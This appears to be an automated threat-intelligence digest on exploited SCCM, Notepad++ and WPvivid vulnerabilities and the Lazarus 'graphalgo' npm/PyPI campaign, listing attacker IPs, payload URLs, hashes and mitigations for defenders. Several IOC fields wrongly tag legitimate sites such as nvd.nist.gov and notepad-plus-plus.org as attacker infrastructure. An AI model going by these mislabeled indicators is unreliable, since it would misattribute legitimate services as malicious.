CISA Flags Critical Microsoft SCCM Flaw as Exploited in Attacks
CISA has mandated U.S. federal agencies to secure their systems against a critical Microsoft Configuration Manager vulnerability, CVE-2024-43468, which is now actively exploited in attacks. This SQL injection flaw, reported by Synacktiv and patched by Microsoft in October 2024, allows unauthenticated remote attackers to achieve code execution with the highest privileges on the server or underlying database. Despite Microsoft's initial assessment that exploitation was "less likely," Synacktiv released proof-of-concept code in November 2024, leading CISA to flag the vulnerability as actively exploited and order Federal Civilian Executive Branch agencies to patch by March 5th, as per Binding Operational Directive (BOD) 22-01, while also urging all network defenders, including those in the private sector, to apply mitigations promptly.
Severity: Critical
Threat Details and IOCs
| Malware: | BADIIS, StealC, stealc_v2 |
| CVEs: | CVE-2024-43468 |
| Technologies: | Microsoft Configuration Manager, Microsoft SQL Server, Microsoft Windows, Microsoft Windows Server |
| Attacker URLs: | https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468, https://nvd.nist.gov/vuln/detail/CVE-2024-43468 |
| Victim Industries: | Defense, Financial, Financial Services, Government, Healthcare, Information Technology |
| Victim Countries: | United States |
Mitigation Advice
- Immediately apply the security updates for CVE-2024-43468 to all Microsoft Configuration Manager (SCCM/ConfigMgr) instances as released by Microsoft in October 2024.
- Use a vulnerability scanner to perform an authenticated scan of the network to identify all instances of Microsoft Configuration Manager and confirm they are patched against CVE-2024-43468.
- Audit the underlying SQL database for the Microsoft Configuration Manager site for any unauthorized or recently created sysadmin accounts and monitor for suspicious activity, such as the execution of `xp_cmdshell`.
Compliance Best Practices
- Implement network segmentation to restrict all access to Microsoft Configuration Manager servers and their underlying databases, ensuring they are only accessible from a limited set of authorized administrative workstations via a secure management VLAN.
- Review and update the organization's patch management policy to enforce a shorter deployment timeline for 'critical' and 'exploited' vulnerabilities, especially for management-plane systems like Microsoft Configuration Manager.
- Initiate a recurring audit of service accounts and administrative permissions for all critical infrastructure, including Microsoft Configuration Manager, to ensure they operate with the minimum necessary privileges to perform their functions.
- Enhance the IT asset management program to maintain a real-time, accurate inventory of all software and systems, including versioning, to accelerate identification of vulnerable assets during future security incidents.
Notepad++ - CVE-2025-15556
A critical vulnerability, CVE-2025-15556, exists in Notepad++ versions prior to 8.8.9, stemming from a weakness in the integrity and authenticity verification of updates (CWE-494). This flaw allows an attacker, through interception or redirection of network traffic, to execute an installer under their control, leading to arbitrary code execution with user privileges. The vulnerability carries a CVSS v3.1 score of 8.8, requires no special privileges for exploitation, and has low attack complexity, though user interaction is necessary. It is actively exploited, with evidence suggesting state-linked groups like Lotus Blossom (Billbug) have leveraged it to deploy backdoors. To mitigate this risk, users should update Notepad++ to version 8.8.9 or higher (with some recommendations for 8.9.1 or later to enforce cryptographic signature verification). As a temporary workaround, network access for the `gup.exe` process and/or the `notepad-plus-plus.org` domain can be blocked. This CVE is listed in CISA's Known Exploited Vulnerabilities Catalog, underscoring its severity and the urgency of applying mitigations.
Severity: Critical
Threat Details and IOCs
| Malware: | Agentemis, Beacon, BEACON, Chrysalis, Cobalt Strike, CobaltStrike, cobeacon, Evora, Metasploit, Metasploit Framework, Sagerunex, ShadowHammer |
| CVEs: | CVE-2012-10051, CVE-2025-15556, CVE-2025-49144, CVE-2025-7775, CVE-2025-7776, CVE-2025-8424 |
| Technologies: | Bitdefender, Citrix Gateway, Google Gemini, Microsoft SharePoint, Microsoft Windows, Notepad++, Photodex ProShow |
| Threat Actors: | APT31, Barium, Billbug, BronzeElgin, JudgmentPanda, LotusBlossom, LotusPanda, RaspberryTyphoon, SpringDragon, Thrip, VioletTyphoon, Zirconium |
| Attacker Countries: | China |
| Attacker IPs: | 124.222.137.114, 45.32.144.255, 45.76.155.202, 45.77.31.210, 51.91.79.17, 59.110.7.32, 61.4.102.97, 95.179.213.0 |
| Attacker Domains: | api.skycloudcenter.com, api.wiresguard.com, cdncheck.it.com, community.notepad-plus-plus.org, download.notepad-plus-plus.org, lovable.app, notepad-plus-plus.org, safe-dns.it.com, self-dns.it.com, temp.sh |
| Attacker URLs: | api.wiresguard.com/api/FileUpload/submit, api.wiresguard.com/update/v1, api.wiresguard.com/users/admin, http://124.222.137.114:9999/3yZR31VK, http://124.222.137.114:9999/api/Info/submit, http://124.222.137.114:9999/api/updateStatus/v1, http://45.32.144.255/update/update.exe, http://45.76.155.202/list, http://45.76.155.202/update/update.exe, http://59.110.7.32:8880/api/getBasicInfo/v1, http://59.110.7.32:8880/api/Metadata/submit, http://59.110.7.32:8880/uffhxpSy, http://95.179.213.0/update/AutoUpdater.exe, http://95.179.213.0/update/install.exe, http://95.179.213.0/update/update.exe, https://45.77.31.210/api/FileUpload/submit, https://45.77.31.210/api/update/v1, https://45.77.31.210/users/admin, https://api.skycloudcenter.com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821, https://api.wiresguard.com/api/FileUpload/submit, https://api.wiresguard.com/api/getInfo/v1, https://api.wiresguard.com/api/Info/submit, https://api.wiresguard.com/update/v1, https://api.wiresguard.com/users/system, https://cdncheck.it.com/api/FileUpload/submit, https://cdncheck.it.com/api/getInfo/v1, https://cdncheck.it.com/api/Metadata/submit, https://cdncheck.it.com/api/update/v1, https://cdncheck.it.com/users/admin, https://community.notepad-plus-plus.org/topic/27298/notepad-v8-8-9-vulnerability-fix, https://download.notepad-plus-plus.org/repository/MISC/npp.8.8.9.Installer.x64.msi, https://notepad-plus-plus.org/downloads/v8.8.9/, https://notepad-plus-plus.org/getDownloadUrl.php, https://notepad-plus-plus.org/news/v889-released/, https://notepad-plus-plus.org/update/getDownloadUrl.php, https://safe-dns.it.com/dns-query, https://safe-dns.it.com/help/Get-Start, https://safe-dns.it.com/resolve, https://self-dns.it.com/list |
| Attacker Hashes: | 06a6a5a39193075734a32e0235bde0e979c27228, 078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5, 07d2a01e1dc94d59d5ca3bdf0c7848553ae91a51, 0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd, 0d0f315fd8cf408a483f8e2dd1e69422629ed9fd, 13179c8f19fbf3d8473c49983a199e6cb4f318f0, 21a942273c14e4b9d3faa58e4de1fd4d5014a1ed, 2a476cfb85fbf012fdbe63a37642c11afa5cf020, 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924, 3090ecf034337857f786084fb14e63354e271c5d, 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad, 4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906, 4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8, 4c9aac447bf732acc97992290aa7a187b967ee2c, 573549869e84544e3ef253bdba79851dcde4963a, 73d9d0139eaf89b7df34ceeb60e5f8c7cd2463bf, 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e, 7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd, 7e0790226ea461bcc9ecd4be3c315ace41e1c122, 813ace987a61af909c053607635489ee984534f4, 821c0cafb2aab0f063ef7e313f64313fc81d46cd, 831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd, 8e6e505438c21f3d281e1cc257abdbf7223b7f5a, 8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e, 90e677d7ff5844407b9c073e3b7e896e078e11cd, 9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600, 94dffa9de5b665dc51bc36e2693b8a3a0a4cc6b8, 9c0eff4deeb626730ad6a05c85eb138df48372ce, 9c3ba38890ed984a25abb6a094b5dbf052f22fa7, 9fbf2195dee991b1e5a727fd51391dcc2d7a4b16, a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9, b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3, bd4915b3597942d88f319740a9b803cc51585c4a, c68d09dd50e357fd3de17a70b7724f8949441d77, ca4b6fe0c69472cd3d63b212eb805b7f65710d33, d0662eadbe5ba92acbd3485d8187112543bcfbf5, d7ffd7b588880cf61b603346a3557e7cce648c93, e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda, f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a, f7910d943a013eede24ac89d6388c1b98f8b3717, fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a |
| Victim Industries: | Aerospace, Artificial Intelligence, Cloud Infrastructure, Construction, Critical Manufacturing, Cryptocurrency, Defense, Defense Industrial Base, Financial Services, Government, Healthcare, High-Tech & Electronics, Information Technology, IT Services, Manufacturing, Media and Entertainment, Military, Multimedia, Software, Technology Hardware, Telecommunications, Transportation |
| Victim Countries: | Afghanistan, Australia, Bangladesh, Belize, Bhutan, Brunei, Cambodia, China, Costa Rica, El Salvador, France, Guatemala, Honduras, Hong Kong, India, Indonesia, Japan, Laos, Malaysia, Maldives, Mongolia, Myanmar, Nepal, Nicaragua, North Korea, Pakistan, Panama, Philippines, Saudi Arabia, Singapore, South Korea, Sri Lanka, Taiwan, Thailand, Timor-Leste, United States, Vietnam |
Mitigation Advice
- Update all instances of Notepad++ to version 8.8.9 or a more recent version.
- Use an Endpoint Detection and Response (EDR) or host-based firewall to create a rule that blocks all outbound network connections from the process `gup.exe`.
- Configure the corporate firewall or DNS filtering service to block all traffic to the domain `notepad-plus-plus.org`.
- Hunt for historical network connections from the process `gup.exe` in endpoint and network logs to identify potential compromises.
Compliance Best Practices
- Implement or enhance a comprehensive software asset inventory system to maintain a real-time catalog of all installed applications and their versions across all company endpoints.
- Establish a formal patch management policy and program that prioritizes vulnerabilities based on active exploitation status and ensures timely deployment of security updates for all third-party software.
- Implement an application allowlisting policy to prevent the execution of unauthorized or unsigned executables and installers on user workstations.
- Develop and enforce a network egress filtering policy that restricts outbound internet access from workstations to only what is required for business functions.
- Enforce the principle of least privilege by ensuring standard users do not have local administrator rights on their workstations.
https://cyberinsider.com/lotus-blossom-hackers-deployed-new-chrysalis-backdoor-via-notepad-updates/
https://cyberpress.org/notepad-code-execution-flaw-exploited-in-the-wild-cisa-issues-alert/
https://cyberpress.org/notepad-supply-chain-hack-exposed/
https://cyberveille.esante.gouv.fr/alertes/notepad-cve-2025-15556-2026-02-13
https://gbhackers.com/cisa-alerts-users-to-notepad-flaw/
https://gbhackers.com/notepad-attack-breakdown-reveals-sophisticated-malware/
https://hothardware.com/news/notepad-confirms-hackers-hijacked-update-infrastructure-to-push-malware
https://meterpreter.org/surgical-espionage-the-chrysalis-backdoor-and-the-6-month-hijack-of-notepad/
https://orca.security/resources/blog/notepad-plus-plus-supply-chain-attack/
https://securelist.com/notepad-supply-chain-attack/118708/
https://securityonline.info/supply-chain-poison-lotus-blossom-hits-notepad-to-deploy-chrysalis/
https://socradar.io/blog/notepad-infrastructure-hijacked/
https://thehackernews.com/2026/02/notepad-hosting-breach-attributed-to.html
https://www.cyberkendra.com/2026/02/chinese-state-hackers-turned-notepads.html
https://www.hendryadrian.com/notepad-hijacked-by-suspected-state-sponsored-hackers/
https://www.hendryadrian.com/notepad-hijacking-linked-to-chinese-lotus-blossom-crew/
https://www.reversinglabs.com/blog/notepad-evolution-supply-chain-threats
https://www.schneier.com/blog/archives/2026/02/backdoor-in-notepad.html
https://www.theregister.com/2026/02/02/notepad_hijacking_lotus_blossom/
https://www.theregister.com/2026/02/12/google_china_apt31_gemini/
WordPress Plugin with 900k Installs Vulnerable to Critical RCE Flaw
A critical remote code execution (RCE) vulnerability, tracked as CVE-2026-1357 with a severity score of 9.8, has been identified in the WPvivid Backup & Migration plugin for WordPress, affecting over 900,000 installations. This flaw allows unauthenticated attackers to upload arbitrary files, potentially leading to a complete website takeover, particularly on sites with the non-default "receive backup from another site" option enabled. The vulnerability stems from improper error handling in RSA decryption, which results in a predictable encryption key, combined with a lack of path sanitization that permits directory traversal and the upload of malicious PHP files. Although exploitation is limited by a 24-hour key validity window, the feature is commonly used for site migrations. The issue was reported by Lucas Montes (NiRoX) to Defiant on January 12, and the vendor, WPVividPlugins, released a fix in version 0.9.124 on January 28, which includes checks for RSA decryption failures, filename sanitization, and restrictions on uploaded file types. Users are strongly advised to upgrade to version 0.9.124 immediately to mitigate this risk.
Severity: Critical
Threat Details and IOCs
| CVEs: | CVE-2026-1357 |
| Technologies: | PHP, WordPress, WPvivid Backup & Migration |
Mitigation Advice
- Identify all WordPress sites using the 'WPvivid Backup & Migration' plugin and update them to version 0.9.124 or newer immediately.
- Review all instances of the 'WPvivid Backup & Migration' plugin and disable the 'receive backup from another site' setting unless it is actively required for a scheduled migration.
- Scan web server file systems for any recently created or modified PHP files within WordPress directories that do not correspond to a legitimate plugin or core update.
Compliance Best Practices
- Establish a formal vulnerability management program that includes automated scanning and a defined patching schedule for all third-party software, including WordPress plugins and themes.
- Deploy a Web Application Firewall (WAF) and create rules to block or alert on directory traversal attempts and the uploading of executable file types like PHP to non-standard directories.
- Implement a File Integrity Monitoring (FIM) solution on all web servers to alert on the creation of or changes to files within the web application's directories.
- Implement a security policy that mandates periodic review of all application and plugin configurations to ensure non-essential features are disabled, following the principle of least privilege.
Inside the ‘graphalgo’ Fake Crypto Developer Recruitment Campaign
The 'graphalgo' campaign, attributed to the North Korean Lazarus Group, is an ongoing fake cryptocurrency developer recruitment operation targeting JavaScript and Python developers through social platforms like LinkedIn and Facebook, and job forums such as Reddit. This campaign employs a fabricated narrative around a blockchain and cryptocurrency exchange company, distributing a Remote Access Trojan (RAT) via 192 malicious packages across npm and PyPI. The campaign began on May 2, 2025, on npm with the `graphalgo` package, later expanding to include packages with "big" in their names starting November 2025. Initial packages, like `graphalgo`, mimicked legitimate libraries and executed a malicious payload (`graph-init.min.js`) upon object instantiation, downloading a non-malicious artifact from GitHub to derive a second-stage payload's IP address. Persistence is established by saving scripts to specific paths on Windows, Linux, and Mac systems, such as `<homeDir>/AppData/Local/Google/Chrome/User Data/Scripts/startup.js`. Later packages, exemplified by `graphnetworkx`, introduced an encryption layer, requiring a specific decryption key constructed from arguments passed to the graph constructor (e.g., `weighted-directed-graph`). A second-stage payload is downloaded from ``hxxps[:]//raw[.]githubusercontent[.]com/johns92/blog_app/refs/heads/main/server/.env.example`,` leading to the final RAT payload that periodically fetches and executes commands from a command and control server. The attackers heavily utilized GitHub to host infrastructure, including fake hiring tasks that provided the necessary arguments to activate the malware, and each malicious package had a corresponding GitHub repository. Malicious scripts are designed to delete themselves and patch invoking files to evade detection. PyPI variants share similar naming conventions, malicious payloads, code flow, key construction, C2 infrastructure, and payload removal functions with their npm counterparts, though decryption functions differ.
Severity: Critical
Threat Details and IOCs
| Malware: | Bada Stealer, BinMergeLoader, ForestTiger, NukeSped, ScoringMathTea |
| Technologies: | Apple macOS, Discord, GitHub, LinkedIn, Linux, Meta Facebook, Microsoft Graph, Microsoft Windows, MuPDF, Node.js, Notepad++, npm, Python, Python PyPI, Reddit, TightVNC, WinMerge, WordPress |
| Threat Actors: | Andariel, APT38, APTC26, Bluenoroff, DiamondSleet, GuardiansOfPeace, HiddenCobra, HIDDEN-COBRA, JadeSleet, LabyrinthChollima, Lazarus, LazarusGroup, NICKELACADEMY, OnyxSleet, StardustChollima, TraderTraitor, UNC4899, Zinc |
| Attacker Countries: | China, North Korea |
| Attacker IPs: | 104.21.80.1, 104.247.162.67, 108.181.92.71, 152.42.239.211, 172.67.193.139, 185.148.129.24, 193.39.187.165, 23.111.133.162, 45.148.29.122, 66.29.144.75, 70.32.24.131, 75.102.23.3, 77.55.252.111, 95.217.119.214 |
| Attacker Domains: | aurevian.cloud, codepool.cloud, coralsunmarine.com, ecudecode.mx, galaterrace.com, kazitradebd.com, mediostresbarbas.com.ar, oldlinewoodwork.com, partnerls.pl, pierregems.com, raw.githubusercontent.com, spaincaramoon.com, trainingpharmacist.co.uk, veltrixcapital.ai, veltrixcap.org, www.anvil.org.ph, www.bandarpowder.com, www.mnmathleague.org, www.scgestor.com.br, www.veltrixcap.org |
| Attacker URLs: | https://coralsunmarine.com/wp-content/themes/flatsome/inc/functions/function-hand.php, https://ecudecode.mx/redsocial/wp-content/themes/buddyx/inc/Customizer/usercomp.php, https://galaterrace.com/wp-content/themes/hello-elementor/includes/functions.php, https://kazitradebd.com/wp-content/themes/hello-elementor/includes/customizer/customizer-hand.php, https://mediostresbarbas.com.ar/php_scrip/banahosting/index.php, https://oldlinewoodwork.com/wp-content/themes/zubin/inc/index.php, https://partnerls.pl/wp-content/themes/public/index.php, https://pierregems.com/wp-content/themes/woodmart/inc/configs/js-hand.php, https://spaincaramoon.com/realestate/wp-content/plugins/gravityforms/forward.php, https://trainingpharmacist.co.uk/bootstrap/bootstrap.php, https://www.anvil.org.ph/list/images/index.php, https://www.bandarpowder.com/public/assets/buttons/bootstrap.php, https://www.mnmathleague.org/ckeditor/adapters/index.php, https://www.scgestor.com.br/wp-content/themes/vantage/inc/template-headers.php, hxxps://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example, www.veltrixcap.org |
| Attacker Hashes: | 00c3c60aea42bc85ab4166caf00a9da9dfcd31ad, 033555f315d1ce6e63eda1e6e6821d481d163865, 03609909b138f75bec5b52732eb512118cc68cda, 0365f525ea5618d9564c30671b18e9bf3b917e1c, 03d9b8f0fcf9173d2964ce7173d21e681dfa8da4, 052c278f727292d779e9cf2465c9065a55b49546, 06b9793ebe4805807f05b2f49a4b2f8161047f97, 086816466d9d9c12fcada1c872b8c0ff0a5fc611, 091de0f6c0a7d4713c83819a538a553ad2e3bb73, 09ff80412f707fecc242b18ac232b18e93dbab27, 0b30a1b7f0a2d23eac10e844ef489e7e1117a867, 0bb0148df7c183be5322ed0529182a06a2ca5cf3, 0be039e3391b2904d6d015b4974939d32c109605, 0cb73d70fd4132a4ff5493daa84aae839f6329d5, 10b958180dc3f9e3cce02a8fab86cb5099746ce4, 12198337384feec6a71260fddde961b5f30e64a2, 134dfb95bd64b371b66b34b8f30ad2181938244d, 142268facd71d20feabea97f8867cb505306e26d, 16aa31d991b25a5e498d7101ef9891b211ecafbf, 18f60badb67c98b4ef70f07aff2b3d579cf1e68f, 1988d1afd33f98d9a0a87c082fde2c59083f3759, 1beb37c7d100e5a8fede590a2aeb08cda237b3e2, 1c11118bbbe0944c99c6130154aae7a49183ab96, 1c3fdc5fe2ca46db9d27b4aa25e3a7684af5bfc0, 1d3d040f3cc2bd4de04f906d4f84d891c4125913, 1f4f73d8b599a6e4176149b69500b30b3396b201, 20a7e464276f4e1a5338230522a446ca7ffba486, 20c4e927e172a60799c47f71cfaf6b5e82faba64, 20eaf2e2913ba6017446e16df1f3f1b9ea69e721, 2283aefe0d59b37af0ce86465b0e770d0ffc364b, 2478ecadb46d4d18706c68b1a4a6a493d8eff51c, 249ad4622d3046892f819cd0094c056694dcef57, 254ef870c2e48a15ffc577a6bc9a3de7c68099ce, 262b4ed6ac6a977135deca5b0872b7d6d676083a, 269ec49a563433993cd216ef5dddd0f923de97b7, 26aa2643b07c48cb6943150ade541580279e8e0e, 26ab088510f0e3fad1280d2d4d6934268a7dd4d1, 28978e987bc59e75ca22562924eab93355cf679e, 28f34f5b52b0c307c30a6721bb137eced2e167e9, 296461bd731f418b8df36f109c30de0bd4aed573, 29ce03eb28cc848e15e5ad9919ce4c263a2cbfd0, 29d7e8ec66426b7e63f83ce301092bd01944738b, 29f31fac84020d647af1961547638b6be51651aa, 2a2b20fddd65ba28e7c57ac97a158c9f15a61b05, 2a9bf45acbcead76a54dd2f655949ea67dd09f7f, 2aa341b03fac3054c57640122ea849bc0c2b6af6, 2b2d02bdb2f5a5f36452de13f0880b213f53e0c9, 2becc8dfd662ac79994c1cac59914f2c00be7a30, 2dcd9901fa0743f8dc35597c2d027a5ef6804c2f, 2e06ddc88ef4a3583df2e30078b4f05723e23f51, 3211392eb14e624fbc11a3b6e42da99950a1f78e, 3337794382593be3a8f324621406df073b85a170, 3c0e265ac38c2d75d75f41a3334148d486234063, 3c3ab1b60e37ec60fc620b14e8a16bd2f8b457b0, 3e14c0ca61c51b399c6a3426c77a3376c33afc69, 3fa294c4314d25cd341a600ac24f5d6f708c4a38, 3fbea692a0c549dc711e9ad2aa016fad6fea68e5, 3fce78c9a7ba3e113404b2b9ae32c36eda5001e3, 3fe294dafca9a86961d2f426b76f327521e55c40, 40ba273eb7495f97ba813ea903834495a47a91d6, 426a964a533de9fe7b9d033582770e167961f5bc, 43d2a634a90e168ccadac47f50769a2a6a98416e, 43fb82b3881dd0fef4b89e55cf6f0a43e1939ac5, 44cd449ab5d35668ac6f5bb71f9f90d6469e976f, 457594493ca35292541b2ce57ba4d610b8fca71c, 45ca547179f02b6c5c9e2d4bc08add1bead67cf5, 46cbc3e9426f83bcc6a6e5d1c86839fe8436150c, 47cc6b384cab1c0499ff525a8c4fcf9113beecf0, 492c45688dc1e568d01693c724d3ef562a95680a, 4afc0cf7b41b40f4bf228b49d3ad5638146b3743, 4b6be3b4a2747be35eb065ef4dc6f57c60180a01, 4d7e20f1b1421db366ae9b95d678e474e3d2238a, 4dab7e9201a431495b3babb165b0e5362287b178, 5200922519c6813561653d363483eb4384579d16, 53f8e29944bf36be007061380e3f4ddb1f2e379b, 557b02cc261ad4655cc7cd9efccb180340dd287e, 567e1b1638f6ddea977ba80d9e0ecb7abe4df7ac, 5af8efdd7a95161e6e5996d95778cf79064fb069, 5b85dd485fd516aa1f4412801897a40a9be31837, 5c01ed7a8d4686603db797b817ee949d871138cd, 5cb58fe4a9053d8ecdd90a254344b0cc73f6a778, 5e5bba521f0034d342cc26db8bcfece57dbd4616, 5f71af195874a7a582c523fe020c0ed183d9b083, 60100d8d7f7dd0cf53088d38a08b2772a5d6e9e7, 61fcf59a6650f7a2a273cc0457a8ce6786f83ea2, 6216e9a70d00d33f1dfc437a51d98dba1f012801, 6230fc3006ecda4899bb9621ef2cf95b78f54a0a, 63100569f6bb327c5785cdb8d9e6d8b2de992fb3, 65cde10d69ce708919fa68e03b6dccc9e583dbe6, 664af994c85d23468f6efd891026f69e27def1fa, 66abee65f46121b5551fcf103961a8828d2f4395, 68ba7ef842fa586cea851b0c5c8acbeaaec5a871, 6abff4b4fe8701bd7e0013fcb12fea373ca8b0b9, 6bb7e15c199604907d561382ef193421db09e7e8, 6caaa280c6280843fd14f63b4b2bc6fc5fa900f3, 6cdd085286b941f8e2bfda641b3be527e18360c0, 6dd72228c3f29ec28c030f739c2ffd822ea99388, 6dfc750fb1c30cbbcdb935bb140ac44982d3961b, 6e31ceb63acb46902deb20009a8bb6142de882cf, 6ebf66318f9fdcd4be42fc73218674128e69df58, 7067522a2c34d2e91c7ffb8dc59def269b24c1dd, 70db64caa7070b5a2abaf842fa663586525de644, 70f1aaf238548a666423458f225d98dff74386da, 71d0ddb7c6cac4ba2bde679941fa92a31fbec1ff, 73951e3d352491ef40473df055b5c8b9cc2b1820, 73e4903608da9e3f730ee35ffd07d561d0ca35cb, 742d5f027889b9686614b0e24e9eb60ef4cd5f78, 756a14ca3baf5ccfc18b2316d52d7fe98e31dfef, 759e78b8b7392686021881951d9329144d7da998, 75b4f29b7b797841dd1132611f248d826ae7bf56, 763907bf89983b36d2161153d91c7f313822bec8, 784b3cda328a49bc6ba5d20be03d7bd76db41917, 78a2db508108506ad453a2298117237702df10a8, 7acf1e9d52630a89b38133be149f95af8a8b810b, 7d0a69b61b590c4615ab9096e2e4f48478a68312, 7ee57e51d157c9aabe1afc59855e90401fd0e2a7, 7fe51338c41c875bf7bb7d96dfa6e8443314a9b7, 83021cfead0849a738ea557588647be634039b01, 834cbb4671d038261c609f2de3312025f773bd4d, 8435d36e2e410a003b6d5568b192c0e153f06ea9, 86c55cc76b918dec25dcb0db4746a3cc58ca8f5a, 86dc6c1cc0c33086d5749883a17bed24e9fa0010, 86f1839df0be17d4d156f69df16eaf5944a29da4, 87b2df764455164c6982ba9700f27ea34d3565df, 89b41008256e7684ba798e0edb27619e7c35c4d7, 8a6c7cbff4f66b61862c66c6c1394dc550c54f95, 8b425247a84d9e506952e2c913393c9ecdab399f, 8baaf0694234a06cce73ccc0910f63dd513329e4, 8dd57b1364d3364cf17c5219a759a2f1787f666c, 8e2ca8ce68cdcc15463a6a96c83da6e394492141, 8ff23154805c304a9863cffc61b1453ddf9ee721, 901c3a0b449322c030d8a6efc6c1332036a414c9, 915131dccbc1234c6560952385185f07de1b3929, 928b2144dc1d485338fc748ab280a5deee9dcf21, 96080e0159c455e3de443526b880a774e9cabbb2, 9622181de887925f692bf51ba69bc6b6694ecc6f, 96447faded23c699025d03406063ac2f425a1bc2, 99fa440b658412b5c2685c6df90cb0d3c4eb84a8, 9b9ec71e1aae94a29487e9936985f71ce18010f9, a4c824afbb4584e4640d0f03fa9d2370f84cfe66, a574ae8b6904cc1c9cafb26e1ccf5e87e6261ad6, a64961f4d1394cad5f2a3c0ccdb7d46f9bc6142c, a8df8cb07bac3c2f6434a21beb58e45f73ab66b2, a8dfbdb54252af72d8c3898656d49f542bbf4407, a98c0377f80f04a3a7cf044d5abe515654520183, a9c1d537ae937580a51293008d78dd507355ee0c, ab827c68d4be6002385b9008fc89eef4e04c6912, ac16b1baede349e4824335e0993533bf5fc116b3, b125f586dae2c664147c4499d7d5c3d43c2678c8, b12eeb595feec2cfbf9a60e1cc21a14ce8873539, b1d6b677917221673dc7e419c535600c129931fb, b21a4affb019afd4eb05bcb5428798ea623bb75c, b31f2162e886683b65b017e1d1a841bd4f10cc11, b32c00c384160bbc18b8dde2299005639a48c18d, b384f23953f4f621e3e9bd1d742edd6ddf9cf4c1, b3a5f72296ec2bf18b29699544f4234d6113941c, b55921f502ec6839b08545a582a4291eaf3d902c, b5d8bb1d4a14c85b9996f05b602c36ef2c508a3b, b5f43299a66f6f8c8200bbde1b690a1ab8a5ef75, b68c49841dc48e3672031795d85ed24f9f619782, b6d8d8f5e0864f5da788f96be085abecf3581cce, b899f364e788501bb4286ff379d5d155599fb35d, bb4e1cea60199c26620715103f4019030fea3792, bdf9b400e2935947c30fc1e5b79352129969dbf7, be2d5cf002a3e0d3414081c5c6b1840962ab9a10, be756aaaf4135c7ec500d14c45a284cb6e8765c9, c118c35a8a5a1160ca1cb1b16a7f62da5c32b8c8, c25bebd17ed164dd39e0d47dd5228dff6c9c3ff9, c2f1f955059e30313f0738e98845d039ca3d7937, c379c40dedb6a54437786572284c249031690249, c3c225bd5e5d0d53bdc403f8da183c63e7a16b7e, c450613503334e4f21bd5ca374c86031ab3ff79b, c7141b43dd62c712cc625cd5e9f27ea6fd34955d, ca29de9683e093e2930bf1b3138b9fbace8862e5, ca9196dd69b93c07126654024c19da991302ed71, cb7834be7de07f89352080654f7feb574b42a2b8, cd332731273e93769cc28dde5a02814c027e1b77, cd4884dc181a011c75405940172a994b7923daba, ce41fc66abc67957cbe8828b439f31c1f1227b35, cf8a3a18a719512d833c33973c1862eda56aa2b8, cffcb81564f598b9cb55bb8430399497ea366da1, d15ea1735d6b057884faaa90afa46c8ee0be5927, d1ad29b721ee4ed29ce2bf7ffe0be84d32d57924, d228a43e5b158532b5ffd2f526b34b2ee6024de8, d3ff122a9cf8e34d29dc2859ead08d3db62b5687, d4e162311ad2adbc67045598bf0731473d44105b, d5656ca2ab4a7c0d5f367c2d35a3e680c48d7c95, d9648b415ddb8f45fad1f129a64960f49aa6e42b, dac7f0061abde4d0e517d044d3360d4e6dde2418, dbb4031e9bb8f8821a5758a6c308932b88599f18, e00defa7cbdd9d79ccb6e33caa9f9b0c704a0dbd, e131392b3897ef6ccfb54770fd2e47811681610a, e1cb6f690371fa76f3d062a80054e18d6b02461e, e44b02e1bcad6493a925181cb5ccc9f3a64ebc31, e4551317d305111fa15081ddbbf5ab6aa744d84c, e58a77ecfaa1e0a481581ec6831874d655976203, e5af589fcd2bfb7093dd10274161a3c0de42057f, e670c4275ec24d403e0d4de7135cbcf1d54ff09c, e9740a495371fae13f997786089ab941cd5633dd, ea0b470b55f57dd8d2359894ad9143093a46e3e4, ec7a06d3184c5c0265cf2e9c2f2a7d3eaa91fffe, ed4e8c98a71e9763d23d0275f17ad2712c327944, ef332b55ed0083373097bd0862b487f384d88d17, efefa0438f2a01121fb6fab0b04978f6631ed87f, f0e406f821ffccb0eb56d7c6a9b62267eb9c21f6, f1668ee99e6f7a5a7aa4577c9298f8efb154653e, f1bb514e2ef6bc4a1d11637cb92c08161520183f, f33dc1bfbece7ada203e00477ca029baaaa6f61d, f40725fc376828fa099414166a097f179e6cb62b, ff388fd9a3e85af541949f2087bf09e276a3d75f, ff683cdbbcdfbd18f4d8f99e62c202add282e216 |
| Victim Industries: | Aerospace, Cryptocurrency, Financial Services, High-Tech & Electronics, Information Technology, Manufacturing, Software |
| Victim Countries: | Albania, Australia, Austria, Bosnia and Herzegovina, Bulgaria, Croatia, Czech Republic, Germany, Greece, Hungary, India, Japan, Kosovo, Liechtenstein, Lithuania, Moldova, Montenegro, North Macedonia, Poland, Romania, Serbia, Slovakia, Slovenia, South Korea, Switzerland, Turkey, United Kingdom, United States |
Mitigation Advice
- Add the URL `raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example` to the network firewall and web proxy blocklists.
- Scan developer workstations and build servers for the existence of `startup.js` files in the specific persistence locations identified for Windows, Linux, and macOS.
- Audit all JavaScript project dependencies (`package.json` files) to identify and remove any packages containing 'graph' or 'big' in their names, paying special attention to those explicitly named in the report.
- Audit all Python project dependencies (`requirements.txt` or similar files) to identify and remove any packages containing 'graph' or 'big' in their names.
Compliance Best Practices
